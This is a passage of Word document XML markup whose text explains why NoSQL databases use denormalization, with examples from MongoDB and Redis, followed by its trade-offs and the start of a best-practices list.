      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Why is Denormalization Used in NoSQL Databases?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EA9B6A" w14:textId="77777777" w:rsidR="00C5104D" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5104D" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">**1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Read Performance Optimization</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5159178F" w14:textId="77777777" w:rsidR="00C5104D" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5104D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="455"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Reason</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: NoSQL databases, especially document stores and key-value stores, are designed for high-speed data retrieval. Denormalization helps to reduce the number of database lookups and joins, thus speeding up read operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E9B1EC" w14:textId="77777777" w:rsidR="00C5104D" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5104D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="455"/>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document-oriented NoSQL database like MongoDB, embedding related data within a single document avoids the need for multiple queries or complex joins.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5B96EE" w14:textId="77777777" w:rsidR="00C5104D" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5104D" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">**2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Schema Flexibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBA0D64" w14:textId="77777777" w:rsidR="00C5104D" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5104D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="456"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Reason</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: NoSQL databases often provide a more flexible schema compared to traditional relational databases. Denormalization takes advantage of this flexibility to store data in a way that aligns with application requirements and access patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A08282" w14:textId="77777777" w:rsidR="00C5104D" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5104D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="456"/>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 user profile document in MongoDB might include both user information and their recent activities, which would be normalized in a relational database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BB6C25" w14:textId="77777777" w:rsidR="00C5104D" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5104D" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">**3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2630CD1E" w14:textId="77777777" w:rsidR="00C5104D" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5104D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="457"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Reason</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Many NoSQL databases are designed to scale horizontally across distributed systems. Denormalization reduces the complexity of queries, making it easier to distribute and manage data across multiple nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3939AD2C" w14:textId="77777777" w:rsidR="00C5104D" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5104D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="457"/>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 key-value store like Redis can benefit from storing precomputed aggregates or frequently accessed data to reduce computational overhead on each query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B55071" w14:textId="77777777" w:rsidR="00C5104D" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5104D" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">**4. </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Simplified Data Access Patterns</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADBE89F" w14:textId="77777777" w:rsidR="00C5104D" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5104D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="458"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Reason</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Denormalization aligns the data model with application-specific access patterns. By storing data in a way that reflects how it will be queried, applications can access data more efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1178196B" w14:textId="77777777" w:rsidR="00C5104D" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5104D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="458"/>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blog application, storing a list of comments within a blog post document allows for quick retrieval of both posts and their comments in a single read operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4773E8E0" w14:textId="77777777" w:rsidR="00C5104D" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5104D" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">**5. </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Reduced Complexity</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B9AC65" w14:textId="77777777" w:rsidR="00C5104D" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5104D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="459"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Reason</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Denormalization can simplify the data model by reducing the number of relationships and join operations required. This makes data access and manipulation more straightforward.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2217826C" w14:textId="77777777" w:rsidR="00C5104D" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5104D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="459"/>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product catalog, storing product details and pricing information together in a single document eliminates the need for separate price lookup queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF33A01" w14:textId="77777777" w:rsidR="00C5104D" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5104D" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Trade-offs of Denormalization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60053139" w14:textId="77777777" w:rsidR="00C5104D" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5104D" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>While denormalization can significantly improve read performance and simplify data access, it comes with certain trade-offs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423E3119" w14:textId="77777777" w:rsidR="00C5104D" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5104D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="460"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Data Redundancy</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EE5A4E" w14:textId="77777777" w:rsidR="00C5104D" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5104D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="460"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Consequence</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Introducing redundancy can lead to increased storage requirements and potential data consistency issues if the same data is duplicated across multiple locations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610B5473" w14:textId="77777777" w:rsidR="00C5104D" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5104D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="460"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Complexity in Write Operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB3B21F" w14:textId="77777777" w:rsidR="00C5104D" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5104D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="460"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Consequence</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Updating redundant data can become complex, as changes need to be propagated across multiple places. This can lead to increased write complexity and potential for inconsistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC509C8" w14:textId="77777777" w:rsidR="00C5104D" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5104D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="460"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Increased Storage Costs</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6415122C" w14:textId="77777777" w:rsidR="00C5104D" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5104D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="460"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Consequence</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Storing redundant data increases storage requirements, which can lead to higher storage costs and potential inefficiencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17671DFE" w14:textId="77777777" w:rsidR="00C5104D" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5104D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="460"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Potential for Data Anomalies</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F66459" w14:textId="77777777" w:rsidR="00C5104D" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5104D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="460"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Consequence</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Redundant data increases the risk of data anomalies or inconsistencies if updates are not properly managed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C74AAB0" w14:textId="77777777" w:rsidR="00C5104D" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5104D" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Best Practices for Denormalization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C4DB30" w14:textId="77777777" w:rsidR="00C5104D" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5104D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="461"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Analyze Access Patterns</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Determine how data is accessed and used in the application to identify which parts of the data model benefit from denormalization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25196B39" w14:textId="77777777" w:rsidR="00C5104D" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5104D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="461"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
